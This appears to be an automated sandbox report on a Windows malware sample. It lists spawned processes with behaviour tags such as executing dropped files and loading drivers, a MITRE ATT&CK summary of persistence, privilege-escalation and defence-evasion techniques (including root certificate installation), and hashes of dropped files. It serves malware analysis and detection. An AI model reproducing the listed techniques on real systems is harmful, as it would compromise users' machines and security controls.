c:\windows\system32\svchost.exe  [PID 1712]
  cmdline: c:\windows\system32\svchost.exe -k localservice -s netprofm
c:\windows\system32\svchost.exe  [PID 1668]
  cmdline: c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe  [PID 1656]
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe  [PID 1564]
  cmdline: c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe  [PID 1452]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe  [PID 1440]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s UserManager
  \??\c:\windows\system32\sihost.exe  [PID 4336]
    cmdline: sihost.exe
  \??\c:\windows\system32\sihost.exe  [PID 4136]
    cmdline: sihost.exe
  \??\c:\windows\system32\sihost.exe  [PID 4636]
    cmdline: sihost.exe
  \??\c:\windows\system32\sihost.exe  [PID 4364]
    cmdline: sihost.exe
  \??\c:\windows\system32\sihost.exe  [PID 3148]
    cmdline: sihost.exe
  \??\c:\windows\system32\sihost.exe  [PID 2996]
    cmdline: sihost.exe
c:\windows\system32\svchost.exe  [PID 1432]
  cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe  [PID 1280]
  cmdline: c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe  [PID 1248]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe  [PID 1232]
  cmdline: c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe  [PID 1216]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe  [PID 1036]
  cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe  [PID 700]
  cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe  [PID 348]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
  - Checks SCSI registry key(s)
c:\windows\system32\svchost.exe  [PID 356]
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe  [PID 916]
  cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
c:\windows\system32\svchost.exe  [PID 744]
  cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
C:\Windows\System32\svchost.exe  [PID 1296]
  cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup
  - Suspicious use of NtCreateUserProcessOtherParentProcess
C:\Windows\System32\smss.exe  [PID 704]
  cmdline: \SystemRoot\System32\smss.exe 000000d8 00000080
C:\Windows\System32\smss.exe  [PID 3808]
  cmdline: \SystemRoot\System32\smss.exe 000000b0 00000080
C:\Windows\System32\smss.exe  [PID 2240]
  cmdline: \SystemRoot\System32\smss.exe 00000120 00000080
C:\Windows\System32\smss.exe  [PID 1200]
  cmdline: \SystemRoot\System32\smss.exe 00000114 00000080
  - Executes dropped EXE
C:\Windows\System32\smss.exe  [PID 4488]
  cmdline: \SystemRoot\System32\smss.exe 000000e4 00000080
C:\Windows\System32\smss.exe  [PID 4336]
  cmdline: \SystemRoot\System32\smss.exe 00000100 00000080
C:\Windows\System32\smss.exe  [PID 4136]
  cmdline: \SystemRoot\System32\smss.exe 000000f4 00000080
C:\Windows\System32\smss.exe  [PID 4364]
  cmdline: \SystemRoot\System32\smss.exe 00000110 00000080
C:\Windows\System32\smss.exe  [PID 4224]
  cmdline: \SystemRoot\System32\smss.exe 000000f4 00000080
C:\Windows\System32\smss.exe  [PID 4636]
  cmdline: \SystemRoot\System32\smss.exe 000000f8 00000080
C:\Windows\System32\smss.exe  [PID 3148]
  cmdline: \SystemRoot\System32\smss.exe 00000108 00000080
C:\Windows\System32\smss.exe  [PID 1476]
  cmdline: \SystemRoot\System32\smss.exe 000000d4 00000080
C:\Windows\System32\smss.exe  [PID 4152]
  cmdline: \SystemRoot\System32\smss.exe 00000100 00000080
C:\Windows\System32\smss.exe  [PID 3760]
  cmdline: \SystemRoot\System32\smss.exe 00000110 00000080
  - Suspicious behavior: LoadsDriver
C:\Windows\System32\smss.exe  [PID 884]
  cmdline: \SystemRoot\System32\smss.exe 000000e8 00000080
C:\Windows\System32\smss.exe  [PID 4544]
  cmdline: \SystemRoot\System32\smss.exe 000000c8 00000080
  - Suspicious behavior: LoadsDriver
C:\Windows\System32\smss.exe  [PID 616]
  cmdline: \SystemRoot\System32\smss.exe 000000e8 00000080
C:\Windows\System32\smss.exe  [PID 2652]
  cmdline: \SystemRoot\System32\smss.exe 00000128 00000080
C:\Windows\System32\smss.exe  [PID 1060]
  cmdline: \SystemRoot\System32\smss.exe 0000007c 00000080
C:\Windows\System32\smss.exe  [PID 3880]
  cmdline: \SystemRoot\System32\smss.exe 000000d8 00000080
C:\Windows\System32\smss.exe  [PID 808]
  cmdline: \SystemRoot\System32\smss.exe 0000011c 00000080
C:\Windows\System32\smss.exe  [PID 1720]
  cmdline: \SystemRoot\System32\smss.exe 000000e4 00000080
C:\Windows\System32\smss.exe  [PID 3744]
  cmdline: \SystemRoot\System32\smss.exe 00000110 00000080
C:\Windows\System32\smss.exe  [PID 60]
  cmdline: \SystemRoot\System32\smss.exe 0000007c 00000080
C:\Windows\System32\smss.exe  [PID 1524]
  cmdline: \SystemRoot\System32\smss.exe 000000d8 00000080
C:\Windows\System32\smss.exe  [PID 4548]
  cmdline: \SystemRoot\System32\smss.exe 000000b0 00000080
C:\Windows\System32\smss.exe  [PID 3744]
  cmdline: \SystemRoot\System32\smss.exe 0000011c 00000080
C:\Windows\System32\smss.exe  [PID 4220]
  cmdline: \SystemRoot\System32\smss.exe 0000011c 00000080
C:\Windows\System32\smss.exe  [PID 2672]
  cmdline: \SystemRoot\System32\smss.exe 000000dc 00000080
C:\Windows\System32\smss.exe  [PID 844]
  cmdline: \SystemRoot\System32\smss.exe 000000d8 00000080
  - Drops file in Program Files directory
Network
MITRE ATT&CK Enterprise v15
Persistence
- Create or Modify System Process: 2
- Windows Service: 2
- Scheduled Task/Job: 1
Privilege Escalation
- Create or Modify System Process: 2
- Windows Service: 2
- Scheduled Task/Job: 1
Defense Evasion
- Impair Defenses: 1
- Modify Registry: 2
- Scripting: 1
- Subvert Trust Controls: 1
- Install Root Certificate: 1
Downloads
SHA15ac690d49430a9f22f24656387d7b1c12791b776
SHA25687c4e34bd82ec6ad1f3d43de1e8516c0e53f11ff685347285bf326946539051f
SHA5121fe42ccbea531a2d0191df8997e5ae15cf3aa086474084df7081b563dc889f8501e5e73a77e0ad1b3fcf6e3544a1dba7b0287c5c57220ae0637f12d753d73512
-
Filesize
1.8MB
MD557dfa6af2ad2c53ec7e48608537a15d6
SHA1e06fd0ded0b556b08bbee73070958cd745b4ad3d
SHA256593b2f3cf064a0e3cc06cbe98fb6af53077f0bf588e479d045a96aec6623c51f
SHA512cfe65d0d62b1f98a539eec75448c7053ea9373bd965fee69310663ceedcda5cb86a879a21b5a431bd8ff522fc1462ee68c48d8f36eff7838abc8c50df1a18c13
-
Filesize
2.0MB
MD5137fa15fc3cd9d1dbd82f76044c72415
SHA11e0056af5d942b9b8712f63a04d0cf53f5859100
SHA256ed654c513c78e6561dddf40b66e9d96d163b182e943094cb358d4814c3005202
SHA512b3a2a1154e7ed5fe6f25560e4a15127775e5cde62c5c7d533c5aae4a74eeab583133e35addad3af159123cb4124e5e1cd3e2061357cfd21bf762d1c09341c176
-
Filesize
982KB
MD55a82c03f85bc0f0f66ac295e5db4b39d
SHA1b1338e59e600f693e32995f71035aecf4359c862
SHA256d10898316b7fc982ee89976695d750abd5180aef43e3140ab3c7c031e8427e11
SHA51275546be90af73b8d27013f8ca6c6d52a1d461f6858f08eac1d0c0653b3d7eb68ead32da81b092822fb6a389bd1b3213f4887bd67f40bc1186da8a4017791cc5a
-
Filesize
1.0MB
MD52c0ffb26c2f6d1e53942a96a27b4eb1b
SHA190f848f632ceff3fcc8008878c277028c7809933
SHA25690dbd5d5ac940b4b7e977fb421bbef79f7fce4d4d61b4edd84bc10cef01cbb58
SHA512efa913bf6b66e3f9a0b767d2a539653cb8cc5dffa14eb8395656b321d84e0bdf838d7aaa3e0411b794503fa66d6189fee43bf19047ec9203d86a33dd4298ed8c
-
Filesize
4.6MB
MD5cf8a20b11ce9cf757bfaf49bd93ac524
SHA1e349ecb0e296bb830f1b6495b003062c299c4016
SHA256a3fa2ab4e84d4ea0a272962535016b660eb797bb2210e747d28a51a024a3e6c5
SHA512a46ecf6435515de574074790696a19abdaea81b85d5d7dc6d3d0138cf75d4916acd500639889770dfc9a8de3f499cd39d86958bf46e47ded0a9227029fe7f73a
-
Filesize
4.1MB
MD5f858faa32bbb6f697ae7e1b6e23e64c5
SHA15060f65b1183e754e8d684c7ab935354e25da3df
SHA256725bb78fd984fb588e68e8126fd54b6c8dd826952d1a819a61967fbb86f32bf8
SHA512f4495de04ad241afd74009f878a98283122af5aef9d9870f5cd9659ec2ccf785945b55a2d15d4a389e20c0c78ac40442381b5544552e06dfe50855a62b28a718
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
244KB
MD54c889b86323b9898a0894fb5a5385486
SHA1c646e2f492591b976b047ca595d22ea834ee0cc0
SHA256c78d650b4742ce97e028241de008dd98b962dd8b4ad0999162126c579ea50593
SHA512b798560866e3e464acb31aa4ea0185521e5e76bb71bde8b35df9cdbf822227a761eabdb21f7311f04be8bc49457c98272bc7975e28b67dd40f31765f690a70b3
-
Filesize
168B
MD558af5133d98dfd7d75b9adaad2a6791c
SHA1650764536b4a0ee79a66889d4aea58715064a1b9
SHA2563b8160bf5828f0557516ef3fc5df6e42e3af782357bd1b0bd7cc6057e811d652
SHA5120be8026831cc429bf63fb2eb9f03db0fe8c6a7bf04e658ff6de1cd1ad13ab9e89cef9f319fdae1bf7d85521442c9c32ca9face66d098505b324d8f934649c1a2
-
Filesize
128B
MD511bb3db51f701d4e42d3287f71a6a43e
SHA163a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA2566be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2
-
Filesize
187KB
MD5a6f42b969e6e86d019a6d747313af829
SHA1a3304538938664f08a17697640dc36c83cecb11a
SHA256cff7c0b0e39dd69efe209e4a952147d5fec729fee64816cd6a4d0583fea30e86
SHA512cfe003eef556fee261487188339607dcb1f7d3d7b4094e3e09fdefa785aaa005709d1aa7a105a5d1fd87bb0a99fc4313dab983c8f26cfb12695c1a763420a911
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD5ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5065659124d9dd348476a53c4fb958bd6
SHA1f183b5807a73a8334168849911c2101265172098
SHA2560d5229666a881640e3dae3d737edb59eea7a475b2256233d237ba42b9f8aa91d
SHA512b8a018c55303786c1836a97c9fcb9bedefe4e6502b660d05848421d82271944940e511616c746dc157c24c8fa5ba0de0addca37fcd39bf06473b6f185ccf04da
-
Filesize
742KB
MD5544cd51a596619b78e9b54b70088307d
SHA14769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719
-
Filesize
25KB
MD540d7eca32b2f4d29db98715dd45bfac5
SHA1124df3f617f562e46095776454e1c0c7bb791cc7
SHA25685e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA5125fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d